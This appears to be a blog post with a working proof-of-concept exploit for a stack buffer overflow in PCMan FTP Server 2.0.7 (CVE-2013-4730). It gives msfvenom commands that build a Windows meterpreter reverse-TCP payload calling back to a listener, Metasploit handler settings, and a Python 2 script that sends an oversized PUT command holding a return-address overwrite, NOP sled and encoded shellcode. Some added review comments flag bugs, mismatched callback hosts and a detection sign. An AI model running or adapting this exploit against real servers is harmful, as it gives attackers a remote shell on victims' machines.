Sunday, 9 September 2018

PCMan FTP Server Remote Buffer Overflow

Commands:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.141 LPORT=31337 -b '\x00\x0a\x0d' -f python
# Payload size: 360 bytes
#
# set payload windows/meterpreter/reverse_tcp
# set lhost <host>
# set lport <port>
# set exitonsession false
# exploit -j -z










# Return-address overwrite: a 'jmp esp' gadget in SHELL32.dll, written
# little-endian (0x7CA58265).  Presumably valid only for the exact Windows
# build the author tested -- a fixed address in a non-ASLR system DLL is the
# assumption this whole chain rests on; confirm before reading further.
eip = "\x65\x82\xA5\x7C" # \x65\x82\xA5\x7C : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll]



Bad Chars:

# Bad-character probe: every byte value 0x01..0xff in order.  It stands in for
# the real payload so the bytes the server mangles can be spotted in memory.
# 0x00 is omitted from the probe itself; the msfvenom line above also strips
# 0x0a and 0x0d via -b.
payload = "".join(chr(i) for i in range(1, 256))




Buf.py

#!/usr/bin/python
# Exploit: PCMan FTP Server 2.0.7 PUT Buffer Overflow
# Author: @xerubus
# CVE: 2013-4730
#
# Proof-of-concept for a stack buffer overflow in the PUT command handler:
# the script logs in as anonymous and sends one oversized PUT argument laid
# out as filler + return address + NOP sled + encoded payload.  This is
# Python 2 code (print statement, str used as a raw byte buffer); it does not
# run unmodified on Python 3.
import sys, socket

# NOTE(review): the guard only rejects a bare invocation; argv[2] is read
# unconditionally below, so "python exploit.py host" dies with IndexError
# instead of printing the usage line.
if len(sys.argv) <= 1:
    print "Usage: python exploit.py [host] [port]"
    exit()

host = sys.argv[1]
port = int(sys.argv[2])

rubbish = "\x41" * 2008  # eip offset -- filler up to the saved return address
# Hard-coded 'jmp esp' gadget in SHELL32.dll, little-endian (0x7CA58265).
# Presumably only valid for the exact Windows build the author tested; a
# non-ASLR system DLL is what makes a fixed address usable here -- confirm.
eip = "\x65\x82\xA5\x7C" # \x65\x82\xA5\x7C : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll]
nop = "\x90" * 30  # NOP sled in front of the payload to absorb esp slack

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.77.43 LPORT=31337 -b '\x00\x0a\x0d' -f python
# Payload size: 360 bytes
#
# set payload windows/meterpreter/reverse_tcp
# set lhost <host>
# set lport <port>
# set exitonsession false
# exploit -j -z
#
# NOTE(review): the LHOST here (192.168.77.43) differs from the one in the
# command shown at the top of the post (192.168.85.141).  The bytes below are
# opaque encoder output and cannot be audited by reading -- whatever host and
# port they really call back to is baked in.  Treat them as an untrusted
# binary: inspect in a sandbox, never execute.

buf =  ""
buf += "\xdb\xcf\xbb\x55\x2e\x92\x41\xd9\x74\x24\xf4\x5f\x31"
buf += "\xc9\xb1\x54\x31\x5f\x18\x03\x5f\x18\x83\xc7\x51\xcc"
buf += "\x67\xbd\xb1\x92\x88\x3e\x41\xf3\x01\xdb\x70\x33\x75"
buf += "\xaf\x22\x83\xfd\xfd\xce\x68\x53\x16\x45\x1c\x7c\x19"
buf += "\xee\xab\x5a\x14\xef\x80\x9f\x37\x73\xdb\xf3\x97\x4a"
buf += "\x14\x06\xd9\x8b\x49\xeb\x8b\x44\x05\x5e\x3c\xe1\x53"
buf += "\x63\xb7\xb9\x72\xe3\x24\x09\x74\xc2\xfa\x02\x2f\xc4"
buf += "\xfd\xc7\x5b\x4d\xe6\x04\x61\x07\x9d\xfe\x1d\x96\x77"
buf += "\xcf\xde\x35\xb6\xe0\x2c\x47\xfe\xc6\xce\x32\xf6\x35"
buf += "\x72\x45\xcd\x44\xa8\xc0\xd6\xee\x3b\x72\x33\x0f\xef"
buf += "\xe5\xb0\x03\x44\x61\x9e\x07\x5b\xa6\x94\x33\xd0\x49"
buf += "\x7b\xb2\xa2\x6d\x5f\x9f\x71\x0f\xc6\x45\xd7\x30\x18"
buf += "\x26\x88\x94\x52\xca\xdd\xa4\x38\x82\x12\x85\xc2\x52"
buf += "\x3d\x9e\xb1\x60\xe2\x34\x5e\xc8\x6b\x93\x99\x2f\x46"
buf += "\x63\x35\xce\x69\x94\x1f\x14\x3d\xc4\x37\xbd\x3e\x8f"
buf += "\xc7\x42\xeb\x3a\xc2\xd4\xd4\x13\x87\xa9\xbd\x61\x28"
buf += "\xcb\x54\xef\xce\x7b\xf7\xbf\x5e\x3b\xa7\x7f\x0f\xd3"
buf += "\xad\x8f\x70\xc3\xcd\x45\x19\x69\x22\x30\x71\x05\xdb"
buf += "\x19\x09\xb4\x24\xb4\x77\xf6\xaf\x3d\x87\xb8\x47\x37"
buf += "\x9b\xac\x39\xb7\x63\x2c\xd0\xb7\x09\x28\x72\xef\xa5"
buf += "\x32\xa3\xc7\x69\xcd\x86\x5b\x6d\x31\x57\x6a\x05\x07"
buf += "\xcd\xd2\x71\x67\x01\xd3\x81\x31\x4b\xd3\xe9\xe5\x2f"
buf += "\x80\x0c\xea\xe5\xb4\x9c\x7e\x06\xed\x71\x29\x6e\x13"
buf += "\xaf\x1d\x31\xec\x9a\x1e\x36\x12\x58\x02\x9f\x7b\xa2"
buf += "\x02\x1f\x7c\xc8\x82\x4f\x14\x07\xad\x60\xd4\xe8\x64"
buf += "\x29\x7c\x62\xe8\x9b\x1d\x73\x21\x7d\x80\x74\xc5\xa6"
buf += "\xd5\xfa\x2a\x59\xda\xfc\x17\x8f\xe3\x8a\x50\x13\x50"
buf += "\x84\xeb\x36\xf1\x0f\x13\x64\x01\x1a"

# Total command argument: 2008 + 4 + 30 + 360 = 2402 bytes.
evil = rubbish + eip + nop + buf

# NOTE(review): no timeout is set, so any recv() below can block forever if
# the server stops answering, and with no try/finally the socket is never
# closed on an error path.  Every reply is discarded -- the script does not
# check that the login actually succeeded (a 230 reply) before sending PUT.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(1024)  # banner
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS anonymous\r\n")
s.recv(1024)
# 'PUT' is not an RFC 959 command (STOR is); presumably this server accepts
# it, as the header comment implies.  From a monitoring standpoint a single
# FTP command line of ~2.4 KB, mostly 0x41, is an easy anomaly to alert on.
s.send("PUT " + evil + "\r\n")
s.close()
